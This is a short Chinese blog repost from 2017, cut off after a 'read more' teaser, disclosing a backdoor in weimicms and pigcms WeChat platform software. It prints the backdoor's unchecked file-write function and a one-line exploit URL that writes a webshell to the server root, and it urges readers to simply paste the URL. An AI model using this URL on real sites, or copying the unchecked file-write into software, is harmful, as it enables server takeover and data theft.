网曝微信第三方平台出现惊人后门及漏洞 微米 weimicms pigcms 等
[ 2017-10-21 10:09:32 | 作者: admin ]
来源:http://blog.360dseo.com/
网曝微信第三方平台出现惊人后门及漏洞,后门及漏洞轻则导致网站无法访问,内容被篡改,严重的可能盗取服务器资料。
更严重的可能会获取服务器直接管理权限,因为代码属于正常参数提交,所以不会被杀毒软件及各种防火墙拦截,完全免疫!!!
后门1:
执行原理网址后加index.php?g=Home&m=Weixin&a=test&name=muma.php&data=木马内容,
直接打开浏览就可以。笨蛋的说就是粘贴进网址按回车。
这里就是提交一句话木马写入到根目录muma.php内 由于很多程序做了转码,但是还是很多可以执行的。
...
阅读全文…
网曝微信第三方平台出现惊人后门及漏洞,后门及漏洞轻则导致网站无法访问,内容被篡改,严重的可能盗取服务器资料。
更严重的可能会获取服务器直接管理权限,因为代码属于正常参数提交,所以不会被杀毒软件及各种防火墙拦截,完全免疫!!!
后门1:
WeixinAction.class.php
public function test($name, $data)
{
file_put_contents($name, $data);
}
这句话的意思就是在根目录生成文件data可以一句话木马提交注入。public function test($name, $data)
{
file_put_contents($name, $data);
}
执行原理网址后加index.php?g=Home&m=Weixin&a=test&name=muma.php&data=木马内容,
直接打开浏览就可以。笨蛋的说就是粘贴进网址按回车。
这里就是提交一句话木马写入到根目录muma.php内 由于很多程序做了转码,但是还是很多可以执行的。
...
阅读全文…
1
